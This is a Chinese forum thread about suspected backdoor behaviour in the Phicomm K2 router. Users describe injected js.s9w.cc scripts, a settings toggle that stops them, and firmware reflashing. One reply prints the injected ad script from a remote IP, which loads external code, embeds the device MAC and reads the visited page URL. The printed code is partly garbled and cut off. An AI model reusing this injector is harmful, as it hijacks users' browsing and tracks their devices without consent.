請問各位,斐訊k2路由器真的有後門嗎?
請問下,我昨天剛在京東以379的價格下單了K2路由器5台。聽說不少人說這款路由器有後門 會上傳用戶的個人信息,我想問一下,有沒有人真實發現了這個問題,或者真的在使用後出現了實際的泄漏?謝謝!!!
用了0元購的斐訊K2路由器之後,會發現很多時候瀏覽器訪問網頁的時候多了 http://js.s9w.cc的 js ,這是明顯的劫持,網上說是斐訊K2後門在惡意注入。經真的值得買小編測試後發現,登錄路由器後台,192.168.2.1,關掉「系統設置」---》「應用設置」里的「購物比價」功能即可解決這問題。
不放心的朋友還是自行刷機吧,可是別人修改的固件你又放心嗎?當然,我們可以刷華碩路由器的官方rom。
瀏覽器里出現js.s9w.cc的js是個什麼鬼?原來是斐訊k2路由器 的購物比價功能在搗蛋
本人已經入坑,確定了至少有廣告後門。
半年前jd上花399元買的斐訊K2,不知道0元購機,也不知道啥叫K碼。買來就閑置了一段時間,最近用上了後,發現有些根本不可能會有廣告的網站,竟然彈出廣告了。第一反應就是路由器出問題了,對比了訪問頁面的中廣告和沒中廣告的源碼,發現多了這麼一段
&&
蛋疼。
訪問頁面http://222.73.156.145/587?MAC=747D240CC8C0 看看:
(function () {
var ip = "http://222.73.156.145";
var pc = false;
var android = true;
var ios = true;
// 以下是需要手動替換的變數
var ad_customer = "587";
var mid = "561";
var deviceMac = "74:7D:24:0C:C8:C0";
loadExternResource({
scripts: [{tag: "script", url: ip + "/material/common/js/jquery-1.11.2.min.js"}],
callBack: function () {
//需要等待dom body load完成的時候再去載入
$(function(){
//console.log(document.readyState);
aa();
})
}
});
function loadExternResource(obj) {
var elem, links, scripts, callBack, hasReadyState;
var head = document.getElementsByTagName("head")[0];
var ObjOrg = {links: null, scripts: null, callBack: null};
for (var prop in obj) {
ObjOrg[prop] = obj[prop];
}
links = ObjOrg.links;
scripts = ObjOrg.scripts;
callBack = ObjOrg.callBack;
if (links != undefined) {
for (var i in links) {
elem = document.createElement("link");
elem.rel = "stylesheet";
elem.href = links[i].url;
head.appendChild(elem);
}
}
if (scripts != undefined) {
var load, loadHandle, loadCallBack;
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
hasReadyState = (elem.readyState != undefined);
loadCallBack = function (index) {
scripts[index].loadState = true;
for (var j in scripts) {
if (false == scripts[j].loadState) {
return;
}
}
callBack();
};
for (var i in scripts) {
scripts[i].loadState = false;
}
}
for (var i in scripts) {
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
if (hasReadyState) {
elem.onreadystatechange = (function (index) {
return function () {
if (this.readyState == "loaded" || this.readyState == "complete") {
this.onreadystatechange = null;
loadCallBack(index);
}
};
})(i);
} else {
elem.onload = (function (index) {
return function () {
loadCallBack(index);
};
})(i);
}
}
elem.src = scripts[i].url;
head.appendChild(elem);
}
}
}
function getPageCharset() {
var charSet = "";
var oType = getBrowser();
switch (oType) {
case "IE":
charSet = document.charset;
break;
case "FIREFOX":
charSet = document.characterSet;
break;
default:
charSet = document.charset;
break;
}
return charSet;
}
function getBrowser() {
var oType = "";
if (navigator.userAgent.indexOf("MSIE") != -1) {
oType = "IE";
} else if (navigator.userAgent.indexOf("Firefox") != -1) {
oType = "FIREFOX";
}
return oType;
}
function aa() {
/* $.get("http://" + ip + "/getIndex/"+ad_customer+"?MAC="+deviceMac, function(data){
ad_customer =data;
alert("material id"+ ad_customer);
});*/
//增加禁止域名判斷
if(forbidHost()){
return false;
}
hostUrl = encodeURIComponent(top.window.location.href);
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf("Trident") &> -1, //IE內核
presto: u.indexOf("Presto") &> -1, //opera內核
webKit: u.indexOf("AppleWebKit") &> -1, //蘋果、谷歌內核
gecko: u.indexOf("Gecko") &> -1 u.indexOf("KHTML") == -1, //火狐內核
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), //是否為移動終端
ios: !!u.match(/(i[^;]+;( U;)? CPU.+Mac OS X/), //ios終端
android: u.indexOf("Android") &> -1 || u.indexOf("Linux") &> -1, //android終端或者uc瀏覽器
iPhone: u.indexOf("iPhone") &> -1 || u.indexOf("Mac") &> -1, //是否為iPhone或者QQHD瀏覽器
iPad: u.indexOf("iPad") &> -1, //是否iPad
webApp: u.indexOf("Safari") == -1 //是否web應該程序,沒有頭部與底部
};
}()
}
if (isWeiXin() || isAPP()) {
} else if (browser.versions.android == true) { //只投Android
if(android){
str_html = "&